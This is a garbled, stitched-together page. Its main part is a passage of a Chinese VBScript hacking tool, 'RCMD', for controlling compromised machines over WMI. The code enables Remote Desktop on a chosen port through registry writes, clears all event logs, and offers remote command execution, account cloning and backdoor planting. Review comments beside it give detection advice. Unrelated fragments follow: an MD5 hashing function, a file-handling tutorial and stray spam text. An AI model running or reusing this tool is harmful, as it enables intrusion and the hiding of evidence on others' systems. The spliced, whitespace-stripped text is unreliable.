' It then offers to reboot the target so the settings take effect.
'
' Detection and mitigation notes:
' - registry auditing or an endpoint sensor on the RDP-Tcp PortNumber value
'   and on the Start value of TermService catches the change itself
' - a listener on an unexpected port owned by the remote desktop service
'   after an unplanned reboot is the network-side signal
' - baseline the RDP port and service start types in configuration
'   management so drift is reported
outstreem.write"CheckingTheOSType...."
setcolinstoscaption=objswbemservices.execquery("selectcaptionfromwin32_operatingsystem")
foreachobjinstoscaptionincolinstoscaption
ifinstr(objinstoscaption.caption,"Server")>0then
wscript.echo"OK!"
else
wscript.echo"OK!"
wscript.echo"OSTypeis"&objinstoscaption.caption
wscript.echo"youcann'topenterminalservices,canceling...."&chr(13)'60
callmain()
endif
next
wscript.echo"pleseentertheport:"
port=WScript.StdIn.Readline()
ifnotisnumeric(port)orport<1orport>65000then'50
wscript.echo"Thenumberofportiserror."
callmain()
endif
outstreem.write"Writingintoregistry...."
setobjinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")
HKLM=&h80000002
withobjinstreg
.createkey,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"
.setdwordvalueHKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0'70
.createkeyHKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer"
.setdwordvalueHKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1
.setdwordvalueHKLM,"SYSTEM\CurrentControlSet\Control\TerminalServer","TSEnabled",1
.setdwordvalueHKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2
.setdwordvalueHKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2
.setstringvalueHKLM,".DEFAULT\KeyboardLayout\Toggle","Hotkey","1"
.setdwordvalueHKLM,"SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp","PortNumber",port
endwith
showerror(err.number)
wscript.echo"Now,youneedtoreboottarget!"
wscript.echo"Doyouwanttoreboottargetnow?[y/n]"
strcancel=WScript.StdIn.Readline()
ifstrcancel="n"then
wscript.echo"youneedtoreboottargetthen!!"
callmain()
else
callreboot()
endif
wscript.echo"Youcanlogonterminalserviceson"&port&"later,Goodluck!"
callmain()
endFunction
'**************************************************************
functionclog()
' NOTE(review): listing kept verbatim (whitespace lost in extraction).
'
' What the visible code does: enumerates every Win32_NTEventLogFile
' instance on the connected host and calls ClearEventLog on each one,
' stopping at the first non-zero return value.
'
' Detection and mitigation notes:
' - clearing the Security log writes event 1102 into the freshly cleared
'   log, and clearing other logs writes event 104 to the System log; both
'   are high-value alerts
' - forward events to a collector off the host as they are written, so the
'   history survives a local clear
' - logs cleared by a WMI-hosted process (WmiPrvSE.exe) rather than by an
'   administrator's console session point to remote tooling like this
outstreem.write"Clearingalllogs...."
strwqlquery="select*fromWin32_NTEventLogFile"
setcolinstances=objswbemservices.execquery(strwqlquery,"wql",&h20)
foreachobjinstanceincolinstances
ifobjinstance.cleareventlog()<>0then
wscript.echo"Error!"'100
callmain()
endif
next
wscript.echo"OK!"
wscript.echo"AlllogshavebeenclearedSuccessfully!"
callmain()
endfunction
'***************************************************************
functionshowerror(errornumber)
iferrornumberThen
wscript.echo"Error0x"&cstr(hex(err.number))&"."
iferr.description<>""then
wscript.echo"Errordescription:"&err.description&"."
endif
callmain()
else
wscript.echo"OK!"
endif
endfunction
'*****************************************************************
functionusage()
wscript.echostring(79,"*")
wscript.echo"RCMDv1.05"
wscript.echo"RemoteexecutionScript,by黑嘿黑"
wscript.echo"Welcometovisite"
wscript.echo"QQ:123230273E-mail:cnhacker521@hotmail.com"
wscript.echo"Usage:"
wscript.echo"cscript"&wscript.scriptfullname&"targetIPusernamepassword"
wscript.echo"Thenchosethecommand>"
wscript.echostring(79,"*")
endfunction
'**********************************************************
functionmain()
wscript.echo""
wscript.echo"Nowchosethecommand>"
wscript.echo"0.quit退出脚本"
wscript.echo"1.telnet远程开/关telnet"
wscript.echo"2.3389远程开3389"
wscript.echo"3.clog远程删除所有日志"
wscript.echo"4.getf获取肉鸡系统信息"
wscript.echo"5.pslist例出进程"
wscript.echo"6.pskill删除进程"
wscript.echo"7.command远程执行DOS命令"
wscript.echo"8.reboot远程重启肉鸡"
wscript.echo"9.slist例出远程肉鸡上的服务信息"
wscript.echo"A.Share1.列出共享2.创建共享3.删除共享"
wscript.echo"B.ca克隆帐号"
wscript.echo"C.Door种植后门"
wscript.echostring(79,"*")
wscript.echo"CMD>"
cmd=WScript.StdIn.Readline()
wscript.echo""
SelectCasecmd
case"telnet","1"
telnet()
case"3389","2"
rs()
case"clog","3"
clog()
case"getf","4"
inf()
case"psl","pslist","5"
pslist()
case"psk","pskill","6"
pskill()
case"cmd","command","7"
command()
case"reboot","8"
reboot()
case"slist","9"
listlistsvr()
case"share","10","a","A"
share()
case"B","b","11"
ca()
case"C","c","12"
door()
case"quit","0"
wscript.quit
endselect
endfunction




  为了方便代码的书写和调用,我在类中引用了枚举的编程方法


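Function md5_file(filename, raw_output)
    ' Computes the MD5 digest of the file at filename.
    '
    ' filename   - path of the file to hash; it is read as binary data.
    ' raw_output - when true, the digest is returned in binary form
    '              (CAPICOM.Utilities.HexToBinary of the hex string);
    '              otherwise the hex string from HashedData.Value is
    '              returned as is.
    '
    ' NOTE(review): MD5 is not collision-resistant. The result is fine as
    ' a checksum against accidental corruption, but it must not be the
    ' basis for trusting a file that someone else could have crafted; use
    ' a SHA-2 digest for that. CAPICOM must also be installed and
    ' registered on the machine for CreateObject to succeed.
    Const CAPICOM_HASH_ALGORITHM_MD5 = 3
    Const adTypeBinary = 1
    Const CHUNK_SIZE = 1024

    Dim HashedData, Utility, Stream
    Set HashedData = CreateObject("CAPICOM.HashedData")
    Set Utility = CreateObject("CAPICOM.Utilities")
    Set Stream = CreateObject("ADODB.Stream")

    HashedData.Algorithm = CAPICOM_HASH_ALGORITHM_MD5
    Stream.Type = adTypeBinary
    Stream.Open
    Stream.LoadFromFile filename

    ' Feed the file to the hash in fixed-size chunks so that large files
    ' are never held in memory as a whole.
    Do Until Stream.EOS
        HashedData.Hash Stream.Read(CHUNK_SIZE)
    Loop

    ' Release the stream explicitly instead of waiting for the object to
    ' go out of scope.
    Stream.Close

    If raw_output Then
        md5_file = Utility.HexToBinary(HashedData.Value)
    Else
        md5_file = HashedData.Value
    End If
End Function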
本文将介绍采用VisualBasicforWindows(下称VB)开发Windows应用程序时如何读写INI文件


算一个思路,鸡肋,谁有更好的办法完善,能够直接调用cs的asp木马的c端就好了众包抢单2018有了Byte数组,这些问题就将迎刃而解



复制移动删除文件

和文件夹一样我们既可以使用fso提供的方法也可以用file对象

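' The original listing used typographic quotes, which VBScript does not
' accept as string or comment delimiters; they are plain ASCII here.
' The three calls are independent examples: run in sequence, DeleteFile
' fails because MoveFile has already moved c:\asd.txt away.
Set fs = WScript.CreateObject("Scripting.FileSystemObject")

fs.CopyFile "c:\asd.txt", "d:\1\asd.txt", True ' copy the file; an existing destination is overwritten

fs.MoveFile "c:\asd.txt", "d:\" ' move the file

fs.DeleteFile "c:\asd.txt" ' delete the file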



好了,下一章我们就要学习文件的读写了,文件的读写是文件系统,尤其是黑客编程里面十分重要的一部分,今天打字可能有很多错误,大家看的时候仔细一点,不懂得多看看msdn,要提高水平只有靠自己,别人是帮不了你的
